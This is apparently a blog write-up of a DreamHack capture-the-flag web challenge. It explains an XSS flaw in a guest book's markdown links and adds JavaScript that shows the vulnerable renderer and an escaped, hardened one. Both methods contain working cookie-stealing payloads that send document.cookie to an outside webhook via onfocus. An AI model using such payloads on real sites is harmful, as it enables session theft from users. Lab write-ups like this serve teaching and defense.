
DreamHack - Guest book Write-up

Janger 2023. 9. 7. 10:44

Method 1. Using name and onfocus

 

[dreamhack](#' name='foo' onfocus='location.href=`https://bqfyoyg.request.dreamhack.games/cookie=`+document.cookie')

 

URL-encode the text above.

 

%5Bdreamhack%5D%28%23%27%20name%3D%27foo%27%20onfocus%3D%27location%2Ehref%3D%60https%3A%2F%2Fbqfyoyg%2Erequest%2Edreamhack%2Egames%2Fcookie%3D%60%2Bdocument%2Ecookie%27%29

 

Pass the encoded value as the content parameter. The key point is to include #foo at the end of the URL.

http://host3.dreamhack.games:13138/GuestBook.php?content={encoded content}#foo

When this address is opened, the a tag is focused automatically and a request is sent to the attacker's webhook.

 

Method 2. Using autofocus and onfocus

 

[dreamhack](#' autofocus onfocus='location.href=`https://bqfyoyg.request.dreamhack.games/cookie=`+document.cookie')

 

This is a method I found in another write-up. The result is the same as Method 1, even without appending a fragment to the URL.
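
Why both methods work, and what closes the hole, as an added example that is not from the challenge's source code. It assumes the guest book turns `[text](url)` into `<a href='url'>text</a>` without escaping; the function names are hypothetical and the input is a constructed, harmless variant of the Method 2 payload.

```javascript
// Added example. Assumption: the guest book turns [text](url) into
// <a href='url'>text</a> without escaping. All function names are hypothetical.
const LINK = /\[([^\]]*)\]\(([^)]*)\)/g;

// Vulnerable form: url lands inside a single-quoted attribute as-is, so a
// single quote in it ends href and the rest is parsed as new attributes.
function renderVulnerable(content) {
  return content.replace(LINK, (_, text, url) => `<a href='${url}'>${text}</a>`);
}

// Encode every character that can end an attribute value or start markup.
function escapeHtml(s) {
  return s.replace(/[&<>"'`]/g, (c) => `&#${c.charCodeAt(0)};`);
}

// Allow fragments, same-site paths and http(s) URLs; anything else becomes "#".
function safeHref(url) {
  const u = url.trim();
  if (u.startsWith('#') || (u.startsWith('/') && !u.startsWith('//'))) return u;
  try {
    return ['http:', 'https:'].includes(new URL(u).protocol) ? u : '#';
  } catch {
    return '#';
  }
}

// Hardened form: scheme allow-list first, then escape into a quoted attribute.
function renderHardened(content) {
  return content.replace(LINK, (_, text, url) =>
    `<a href="${escapeHtml(safeHref(url))}">${escapeHtml(text)}</a>`);
}

// Rough start-tag tokenizer: attribute names on the first <a> of the output.
function attrNames(html) {
  const tag = html.match(/<a\b([^>]*)>/);
  if (!tag) return [];
  const attr = /([^\s=\/>]+)(?:\s*=\s*(?:'[^']*'|"[^"]*"|[^\s>]+))?/g;
  return [...tag[1].matchAll(attr)].map((m) => m[1].toLowerCase());
}

// Constructed, harmless input with the same shape as the Method 2 payload.
const sample = "[dreamhack](#' autofocus onfocus='void 0')";
console.log(attrNames(renderVulnerable(sample))); // href plus injected attributes
console.log(attrNames(renderHardened(sample)));   // href only
```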

 

Reference

 

https://security.stackexchange.com/questions/168909/xss-inside-anchor-tag-a-without-user-interaction

 

XSS inside anchor tag (<a>) without user interaction?
